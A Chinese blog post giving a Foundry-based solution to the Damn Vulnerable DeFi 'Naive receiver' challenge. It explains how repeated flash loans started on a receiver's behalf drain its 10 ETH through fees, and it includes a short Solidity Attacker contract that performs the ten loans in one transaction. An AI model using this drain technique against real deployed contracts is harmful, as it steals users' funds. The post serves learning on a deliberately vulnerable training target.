damn-vulnerable-defi | Naive receiver

  • zach
  • 更新于 2023-07-02 22:26
  • 阅读 1590

Challenge2-NaivereceiverNaivereceiver为了系统的学习solidity和foundry,我基于foundry测试框架重新编写damnvulnerable-defi的题解,欢迎交流和共建~🎉

Challenge #2 - Naive receiver

Naive receiver

为了系统的学习solidity和foundry,我基于foundry测试框架重新编写damnvulnerable-defi的题解,欢迎交流和共建~🎉

https://github.com/zach030/damnvulnerabledefi-foundry

合约

  • NaiveReceiverLenderPool:继承IERC3156FlashLender,提供闪电贷功能
  • FlashLoanReceiver:继承IERC3156FlashBorrower,用于发起闪电贷接收回调

脚本

  • 部署NaiveReceiverLenderPool合约,向pool中转入1000eth,pool的闪电贷手续费为1eth
  • 部署FlashLoanReceiver合约,向receiver中转入10eth
  • 执行攻击脚本
  • 期望receiver中的余额为0,pool中的余额为1000+10eth

题解

攻击目标是使得receiver中的余额为空,因为每次通过pool执行闪电贷都需要1eth的手续费,因此只需通过receiver向pool执行十次闪电贷即可把10eth全部通过手续费的方式转给pool

image.png 根据题目要求,尽量在一笔交易完成,因此可以编写合约在一笔交易中完成十次闪电贷

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import "../../src/naive-receiver/FlashLoanReceiver.sol";
import "../../src/naive-receiver/NaiveReceiverLenderPool.sol";
import "openzeppelin-contracts/contracts/interfaces/IERC3156FlashBorrower.sol";

contract Attacker {
    constructor(address payable _pool, address payable _receiver){
        NaiveReceiverLenderPool pool = NaiveReceiverLenderPool(_pool);
        for(uint256 i=0; i<10; i++){
            pool.flashLoan(IERC3156FlashBorrower(_receiver), address(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE), 1, "0x");
        }
    }
}
点赞 0
收藏 0
分享
本文参与登链社区写作激励计划 ,好文好收益,欢迎正在阅读的你也加入。

0 条评论

请先 登录 后评论
zach
zach
0x4460...1dE2
江湖只有他的大名,没有他的介绍。